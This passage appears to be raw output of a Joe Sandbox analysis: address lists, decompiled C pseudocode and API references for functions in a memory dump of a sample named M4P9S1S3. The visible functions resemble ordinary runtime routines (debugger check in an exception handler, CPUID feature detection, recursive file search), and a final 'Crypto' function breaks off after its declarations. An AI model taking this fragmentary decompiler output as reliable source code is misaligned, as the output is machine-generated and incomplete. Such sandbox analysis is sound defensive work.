0x0024deb2
0x0024deb7
0x0024deba
0x0024dbd0
0x0024dbd0
0x0024dbd7
0x00000000
0x0024dbd7
0x0024dbca
0x0024dbbb
0x0024db83
0x0024db59
0x0024db59
0x0024db5b
0x0024db61
0x0024db67
0x0024db68
0x0024dde5
0x0024dde5
0x0024ddec
0x0024dded
0x0024ddee
0x0024ddf3
0x0024ddf6
0x0024ddf6
0x0024ddf6
0x0024db57
0x0024ddf8
0x0024ddf8
0x0024ddfa
0x0024dec1
0x0024dec8
0x0024decf
0x0024dee2
0x0024dee8
0x0024dee9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0024de00
0x0024de06
0x0024de06
0x0024de0c
0x0024de0c
0x0024de18
0x00000000
0x0024de18
0x0024d655
0x0024d655
0x0024d657
0x0024d65d
0x0024d65f
0x0024d665
0x0024d667
0x0024d9de
0x0024d9de
0x0024d9e0
0x0024d9e6
0x0024d9ed
0x0024d9ef
0x0024da4e
0x0024da51
0x0024da57
0x0024da5d
0x0024da63
0x0024da65
0x0024da6b
0x0024da6d
0x0024da6d
0x0024da6f
0x0024da6f
0x0024da71
0x0024da7a
0x0024da81
0x0024da84
0x0024da85
0x0024da87
0x0024da87
0x0024da8f
0x0024da91
0x0024da97
0x0024da9d
0x0024daa0
0x00000000
0x0024daa6
0x0024daa6
0x0024daad
0x0024daad
0x0024daa0
0x0024da91
0x0024da65
0x0024d9f1
0x0024d9f1
0x0024d9f3
0x0024d9f9
0x0024d9ff
0x00000000
0x0024d9ff
0x0024d9ef
0x0024d66d
0x0024d66d
0x0024d66d
0x0024d670
0x0024d674
0x0024d674
0x0024d675
0x0024d687
0x0024d694
0x0024d6a3
0x0024d6cd
0x0024d6d2
0x0024d6d8
0x0024d6db
0x0024d6e1
0x0024d6e4
0x0024d760
0x0024d767
0x0024d82b
0x0024d831
0x0024d837
0x0024d83a
0x0024d83c
0x0024d8c5
0x0024d842
0x0024d842
0x0024d848
0x0024d848
0x0024d84e
0x0024d854
0x0024d856
0x0024d858
0x0024d858
0x0024d85e
0x0024d864
0x0024d866
0x0024d86e
0x0024d86e
0x0024d874
0x0024d876
0x0024d878
0x0024d87e
0x0024d880
0x0024d997
0x0024d999
0x0024d99f
0x0024d99f
0x00000000
0x0024d886
0x0024d88c
0x0024d88c
0x0024d88e
0x0024d894
0x0024d897
0x0024d89e
0x0024d8a4
0x0024d8a6
0x0024d8cd
0x0024d8cf
0x0024d8d1
0x0024d8d3
0x0024d8d9
0x0024d8df
0x0024d979
0x0024d979
0x0024d97c
0x00000000
0x0024d982
0x0024d982
0x0024d988
0x00000000
0x0024d988
0x0024d8e5
0x0024d8e5
0x0024d8e5
0x0024d8e8
0x00000000
0x00000000
0x0024d8ea
0x0024d8ec
0x0024d8ee
0x0024d8f7
0x0024d8f7
0x0024d8f9
0x0024d8ff
0x0024d8ff
0x0024d90b
0x0024d916
0x0024d919
0x0024d926
0x0024d929
0x0024d92a
0x0024d92b
0x0024d931
0x0024d933
0x0024d939
0x0024d93f
0x00000000
0x00000000
0x00000000
0x00000000
0x0024d941
0x0024d941
0x0024d941
0x0024d943
0x00000000
0x00000000
0x0024d945
0x0024d948
0x0024da02
0x0024da02
0x0024da04
0x0024da0a
0x0024da10
0x0024da11
0x00000000
0x0024d94e
0x0024d94e
0x0024d950
0x0024d952
0x0024d952
0x0024d952
0x0024d95a
0x0024d95d
0x0024d95d
0x0024d963
0x0024d965
0x0024d967
0x0024d96e
0x0024d974
0x0024d976
0x00000000
0x0024d976
0x00000000
0x0024d948
0x00000000
0x0024d941
0x00000000
0x0024d8e5
0x0024d8a8
0x0024d8a8
0x0024d8aa
0x0024d8b0
0x0024d8b7
0x0024d8b7
0x0024d8ba
0x0024d8ba
0x00000000
0x0024d8aa
0x00000000
0x0024d98e
0x0024d98e
0x0024d98f
0x0024d98f
0x00000000
0x0024d894
0x0024d76d
0x0024d76d
0x0024d77f
0x0024d78e
0x0024d793
0x0024d796
0x0024d798
0x0024d7b4
0x0024d7b7
0x00000000
0x0024d7bd
0x0024d7bd
0x0024d7c4
0x00000000
0x0024d7ca
0x0024d7d0
0x0024d7d2
0x0024d7d8
0x0024d7d8
0x0024d7da
0x0024d7da
0x0024d7dc
0x0024d7e5
0x0024d7ec
0x0024d7ef
0x0024d7f0
0x0024d7f2
0x0024d7f2
0x00000000
0x0024d7da
0x0024d7c4
0x0024d79a
0x0024d79c
0x0024d7a2
0x0024d7a8
0x0024d7a9
0x00000000
0x0024d7a9
0x0024d798
0x0024d6e6
0x0024d6e6
0x0024d6ec
0x0024d6ee
0x0024d703
0x0024d706
0x00000000
0x0024d70c
0x0024d70c
0x0024d713
0x00000000
0x0024d719
0x0024d71f
0x0024d721
0x0024d727
0x0024d727
0x0024d729
0x0024d729
0x0024d72b
0x0024d734
0x0024d73b
0x0024d73e
0x0024d73f
0x0024d741
0x0024d741
0x0024d7fa
0x0024d7fa
0x0024d7fc
0x00000000
0x0024d802
0x0024d802
0x0024d808
0x0024d80b
0x0024d74e
0x0024d755
0x00000000
0x0024d811
0x0024d813
0x0024d819
0x0024d81f
0x0024d820
0x0024da17
0x0024da17
0x0024da1e
0x0024da1f
0x0024da20
0x0024da25
0x0024da28
0x0024da28
0x0024d80b
0x0024d7fc
0x0024d713
0x0024d6f0
0x0024d6f0
0x0024d6f2
0x0024d6f8
0x0024d9a2
0x0024d9a2
0x0024d9a3
0x0024d9a9
0x0024d9a9
0x0024d9b0
0x0024d9b1
0x0024d9b2
0x0024d9b7
0x0024d9ba
0x0024d9ba
0x0024d9ba
0x0024d6ee
0x0024d9bc
0x0024d9bc
0x0024d9be
0x0024da2c
0x0024da33
0x0024da33
0x0024da33
0x0024da3a
0x0024da3c
0x0024da42
0x0024da43
0x0024deef
0x0024deef
0x0024def0
0x0024def1
0x0024def6
0x00000000
0x00000000
0x00000000
0x00000000
0x0024d9c0
0x0024d9c6
0x0024d9c6
0x0024d9cc
0x0024d9cc
0x0024d9d8
0x00000000
0x0024d9d8
0x0024d667
0x0024def9
0x0024def9
0x0024deff
0x0024df01
0x0024df07
0x0024df0d
0x0024df0f
0x0024df11
0x0024df13
0x0024df13
0x0024df15
0x0024df15
0x0024df1e
0x0024df1f
0x0024df23
0x0024df2a
0x0024df2d
0x0024df2e
0x0024df30
0x0024df30
0x0024df34
0x0024df3a
0x0024df3c
0x0024df42
0x0024df44
0x0024df4a
0x0024df4d
0x0024df60
0x0024df63
0x0024df69
0x0024df7e
0x0024df83
0x0024df4f
0x0024df51
0x0024df58
0x0024df58
0x0024df4d
0x0024df86
0x0024df86
0x0024df96
0x0024df9f
0x0024dfa0
0x0024dfa2
0x0024e039
0x0024e03b
0x0024e046
0x0024e046
0x0024e048
0x0024e04b
0x0024e04d
0x00000000
0x0024e03d
0x0024e043
0x0024e043
0x0024dfa8
0x0024dfa8
0x0024dfae
0x0024dfb1
0x0024dfb7
0x0024dfba
0x0024dfc0
0x0024dfc2
0x0024dfc8
0x0024dfca
0x0024dfcc
0x0024dfcc
0x0024dfce
0x0024dfce
0x0024dfdb
0x0024dfe2
0x0024dfe5
0x0024dfe6
0x0024dfe8
0x0024dfe9
0x0024dfe9
0x0024dfed
0x0024dff3
0x0024dff5
0x0024dff7
0x0024dffd
0x0024e000
0x0024e014
0x0024e01a
0x0024e02f
0x0024e034
0x0024e002
0x0024e002
0x0024e009
0x0024e009
0x0024e000
0x0024dff5
0x0024e053
0x0024e053
0x0024e053
0x0024e05f
0x0024e062
0x0024e068
0x0024e06a
0x0024e06c
0x0024e072
0x0024e074
0x0024e074
0x0024e074
0x0024e072
0x0024e079
0x0024e07a
0x0024e07c
0x0024e07e
0x0024e07e
0x0024e080
0x0024e086
0x0024e08c
0x0024e08e
0x0024e094
0x0024e094
0x0024e09a
0x0024e09c
0x00000000
0x00000000
0x0024e0a2
0x0024e0a4
0x0024e0a6
0x0024e0a6
0x0024e0a8
0x0024e0a8
0x0024e0b8
0x0024e0bf
0x0024e0c2
0x0024e0c3
0x0024e0c5
0x0024e0c5
0x0024e0c9
0x0024e0cf
0x0024e0d1
0x0024e0d3
0x0024e0d9
0x0024e0dc
0x0024e0ed
0x0024e0f0
0x0024e0f6
0x0024e10b
0x0024e110
0x0024e0de
0x0024e0de
0x0024e0e5
0x0024e0e5
0x0024e0dc
0x0024e121
0x0024e130
0x0024e131
0x0024e131
0x0024e133
0x0024e135
0x0024e135
0x0024e13b
0x0024e13e
0x0024e140
0x0024e142
0x0024e142
0x0024e145
0x0024e146
0x0024e146
0x0024e14b
0x0024e14e
0x0024e152
0x0024e152
0x0024e153
0x0024e155
0x0024e15b
0x0024e161
0x00000000
0x00000000
0x00000000
0x0024e161
0x0024e094
0x0024e167
0x0024e167
0x00000000
0x0024e167
0x0024ceec
0x0024cee3
0x0024ceda
0x0024ce91
0x0024ce95
0x0024ce9d
0x00000000
0x0024ce9f
0x0024cea5
0x0024ceaa
0x0024e186
0x0024e186
0x0024e189
0x0024e194
0x0024e1bf
0x0024e1c0
0x0024e1c1
0x0024e1c2
0x0024e1c3
0x0024e1c4
0x0024e1c9
0x0024e1d1
0x0024e1d6
0x0024e1dc
0x0024e1e1
0x0024e1e2
0x0024e1e2
0x0024e1e2
0x0024e1e8
0x0024e1e9
0x0024e1e9
0x0024e1ec
0x0024e1f2
0x00000000
0x00000000
0x0024e1f4
0x0024e1f9
0x0024e1fc
0x0024e1fe
0x0024e206
0x0024e208
0x0024e20a
0x0024e20f
0x0024e212
0x0024e218
0x0024e21b
0x0024e21d
0x0024e21d
0x0024e21d
0x0024e21d
0x0024e21b
0x0024e220
0x0024e22c
0x0024e232
0x0024e23a
0x0024e23f
0x0024e240
0x0024e245
0x0024e245
0x0024e245
0x0024e245
0x0024e249
0x0024e249
0x0024e24c
0x0024e253
0x0024e260
0x0024e196
0x0024e196
0x0024e196
0x0024e1a0
0x0024e1a9
0x0024e1ae
0x0024e1bc
0x0024e1bc
0x0024e194
0x0024ce9d

Strings

1#SNAN, xrefs: 0024E173
1#INF, xrefs: 0024E181
1#QNAN, xrefs: 0024E17A
1#IND, xrefs: 0024E16C

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 002430ED, Relevance: 6.1, APIs: 4, Instructions: 75

C-Code - Quality: 85%

			E002430ED(intOrPtr __edx, intOrPtr __edi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				_Unknown_base(*)()* _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t38;
				long _t48;
				signed int _t50;
				intOrPtr _t51;
				signed char _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;

				_t57 = __edi;
				_t56 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				 *0x261458 = 0;
				_v632 = E00243C20(_t57,  &_v808, 0, 0x2cc);
				_v636 = _t55;
				_v640 = _t56;
				_v644 = _t51;
				_v648 = 0;
				_v652 = _t57;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t38 =  &_v0;
				_v612 = _t38;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t38 - 4));
				E00243C20(_t57,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t48 = UnhandledExceptionFilter( &_v12);
				if(_t48 == 0) {
					_t50 =  ~(_t54 & 0x000000ff);
					asm("sbb eax, eax");
					 *0x261458 =  *0x261458 & _t50;
					return _t50;
				}
				return _t48;
			}

0x002430ed
0x002430ed
0x00243101
0x00243103
0x00243106
0x00243106
0x00243117
0x00243125
0x0024312b
0x00243131
0x00243137
0x0024313d
0x00243143
0x00243149
0x00243150
0x00243157
0x0024315e
0x00243165
0x0024316c
0x00243173
0x00243174
0x0024317d
0x00243183
0x00243186
0x0024318c
0x0024319b
0x002431a6
0x002431b1
0x002431b8
0x002431bf
0x002431c9
0x002431d1
0x002431da
0x002431dc
0x002431df
0x002431e1
0x002431eb
0x002431f3
0x002431f8
0x002431fa
0x002431fc
0x00000000
0x002431fc
0x00243207

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002430FA
IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 002431C2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002431E1
UnhandledExceptionFilter.KERNEL32(?), ref: 002431EB

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024339B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132

C-Code - Quality: 84%

			E0024339B(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr* _t70;
				intOrPtr _t76;
				intOrPtr _t81;
				intOrPtr* _t83;
				signed int _t84;
				signed int _t87;

				_t81 = __edx;
				 *0x26145c =  *0x26145c & 0x00000000;
				 *0x25b010 =  *0x25b010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				 *0x25b010 =  *0x25b010 | 0x00000002;
				 *0x26145c = 1;
				_t83 =  &_v44;
				_push(1);
				asm("cpuid");
				_pop(_t67);
				 *_t83 = 0;
				 *((intOrPtr*)(_t83 + 4)) = 1;
				 *((intOrPtr*)(_t83 + 8)) = 0;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				_v12 = _v44;
				_t51 = 1;
				_t76 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t68);
				 *_t83 = _t51;
				 *((intOrPtr*)(_t83 + 4)) = _t67;
				 *((intOrPtr*)(_t83 + 8)) = _t76;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
					L9:
					_t84 =  *0x261460; // 0x0
					L10:
					_v28 = _v32;
					_t53 = _v36;
					_v8 = _t53;
					_v24 = _t53;
					if(_v12 >= 7) {
						_t59 = 7;
						_push(_t68);
						asm("cpuid");
						_t70 =  &_v44;
						 *_t70 = _t59;
						 *((intOrPtr*)(_t70 + 4)) = _t68;
						 *((intOrPtr*)(_t70 + 8)) = 0;
						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
						_t60 = _v40;
						_v20 = _t60;
						_t53 = _v8;
						if((_t60 & 0x00000200) != 0) {
							 *0x261460 = _t84 | 0x00000002;
						}
					}
					if((_t53 & 0x00100000) != 0) {
						 *0x25b010 =  *0x25b010 | 0x00000004;
						 *0x26145c = 2;
						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
							asm("xgetbv");
							_v16 = _t53;
							_v12 = _t81;
							if((_v16 & 0x00000006) == 6 && 0 == 0) {
								_t56 =  *0x25b010; // 0xf
								_t57 = _t56 | 0x00000008;
								 *0x26145c = 3;
								 *0x25b010 = _t57;
								if((_v20 & 0x00000020) != 0) {
									 *0x26145c = 5;
									 *0x25b010 = _t57 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t62 = _v44 & 0x0fff3ff0;
				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
					_t87 =  *0x261460; // 0x0
					_t84 = _t87 | 0x00000001;
					 *0x261460 = _t84;
					goto L10;
				} else {
					goto L9;
				}
			}

0x0024339b
0x0024339e
0x002433ac
0x002433bb
0x0024352e
0x00243534
0x00243534
0x002433c1
0x002433c7
0x002433d2
0x002433d8
0x002433db
0x002433dc
0x002433e0
0x002433e1
0x002433e3
0x002433e6
0x002433e9
0x002433f2
0x00243411
0x00243414
0x00243415
0x00243416
0x0024341a
0x0024341b
0x0024341d
0x00243420
0x00243423
0x00243426
0x0024346b
0x0024346b
0x00243471
0x00243478
0x0024347b
0x0024347e
0x00243481
0x00243484
0x00243488
0x0024348b
0x0024348c
0x00243491
0x00243494
0x00243496
0x00243499
0x0024349c
0x0024349f
0x002434a7
0x002434aa
0x002434ad
0x002434b2
0x002434b2
0x002434ad
0x002434bf
0x002434c1
0x002434c8
0x002434d7
0x002434e2
0x002434e5
0x002434e8
0x002434f9
0x002434ff
0x00243504
0x00243507
0x00243515
0x0024351a
0x0024351f
0x00243529
0x00243529
0x0024351a
0x002434f9
0x002434d7
0x00000000
0x002434bf
0x0024342b
0x00243435
0x0024345a
0x00243460
0x00243463
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002433B4

Strings

, xrefs: 00243511

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024986D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114

C-Code - Quality: 72%

			E0024986D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E00246F55(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E0024EE3B(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E00249AAC(_a16, _t101, __eflags, _t111);
							E00246ECD(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E0024EE3B(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0024792D();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x25b018; // 0x6083b07a
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E0024EE90(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E00243C20(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0024986D(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E0024E9F0(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E002496C5);
									}
								} else {
									_push(_t55);
									_t57 = E0024986D(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E0024986D(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E00243541(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}

0x00249872
0x00249873
0x00249876
0x00249876
0x00249879
0x00249879
0x0024987b
0x0024987c
0x00249885
0x00249886
0x00249889
0x0024988c
0x00249891
0x00249898
0x00249899
0x0024989a
0x0024989d
0x002498a7
0x002498aa
0x002498ab
0x002498ad
0x002498c1
0x002498c1
0x002498c4
0x002498ce
0x002498d3
0x002498d6
0x002498d8
0x00000000
0x002498da
0x002498de
0x002498e7
0x002498ed
0x00000000
0x002498f0
0x002498af
0x002498af
0x002498b5
0x002498ba
0x002498bd
0x002498bf
0x002498f6
0x002498f8
0x002498f9
0x002498fa
0x002498fb
0x002498fc
0x002498fd
0x00249902
0x00249906
0x00249908
0x0024990e
0x00249915
0x00249918
0x0024991b
0x0024991c
0x0024991f
0x00249920
0x00249923
0x00249924
0x00249945
0x00249945
0x00249947
0x00000000
0x00000000
0x0024992c
0x0024992e
0x00249930
0x00249932
0x00249934
0x00249936
0x00249938
0x00249943
0x00000000
0x00249943
0x00249938
0x00249934
0x00000000
0x00249930
0x00249949
0x0024994b
0x0024994e
0x00249967
0x00249967
0x00249969
0x0024996c
0x0024997c
0x0024997e
0x0024997e
0x0024996e
0x0024996e
0x00249971
0x00000000
0x00249973
0x00249973
0x00249976
0x00000000
0x00249978
0x00249978
0x00249978
0x00249976
0x00249971
0x00249984
0x0024998c
0x00249990
0x0024999e
0x002499a3
0x002499b8
0x002499ba
0x002499c0
0x002499c3
0x002499f5
0x002499f5
0x002499f7
0x002499fa
0x00249a00
0x00249a00
0x00249a07
0x00249a21
0x00249a21
0x00249a30
0x00249a35
0x00249a38
0x00249a3a
0x00000000
0x00000000
0x00000000
0x00000000
0x00249a09
0x00249a09
0x00249a0f
0x00249a11
0x00000000
0x00249a13
0x00249a13
0x00249a16
0x00000000
0x00249a18
0x00249a18
0x00249a1f
0x00000000
0x00000000
0x00000000
0x00000000
0x00249a1f
0x00249a16
0x00249a11
0x00000000
0x00249a3c
0x00249a44
0x00249a4a
0x00249a4c
0x00249a4c
0x00249a54
0x00249a59
0x00249a61
0x00249a64
0x00249a66
0x00249a7a
0x00249a7f
0x002499c5
0x002499c5
0x002499c9
0x002499d1
0x002499d1
0x002499d1
0x002499d3
0x002499d6
0x002499d9
0x002499d9
0x00249950
0x00249953
0x00249955
0x00000000
0x00249957
0x00249957
0x0024995d
0x00249962
0x00249955
0x002499e6
0x002499f1
0x00000000
0x00000000
0x00000000
0x002498bf
0x00249893
0x00249895
0x002498f1
0x002498f5
0x002498f5
0x00000000

APIs

Part of subcall function 00246F55: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00248462,00000001,00000364,?,?,?,00247BF4,00246F4A,?,?,002429E9,?), ref: 00246F96

Part of subcall function 0024792D: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0024792F
Part of subcall function 0024792D: GetCurrentProcess.KERNEL32(C0000417,00000000,00246EA0,00000000,?,00000003,00248430), ref: 00247951
Part of subcall function 0024792D: TerminateProcess.KERNEL32(00000000,?,00000003,00248430), ref: 00247958

FindFirstFileExA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 002499B2

Strings

., xrefs: 00249A00

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024C980, Relevance: 3.5, APIs: 2, Instructions: 464
Crypto

C-Code - Quality: 90%

			E0024C980(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
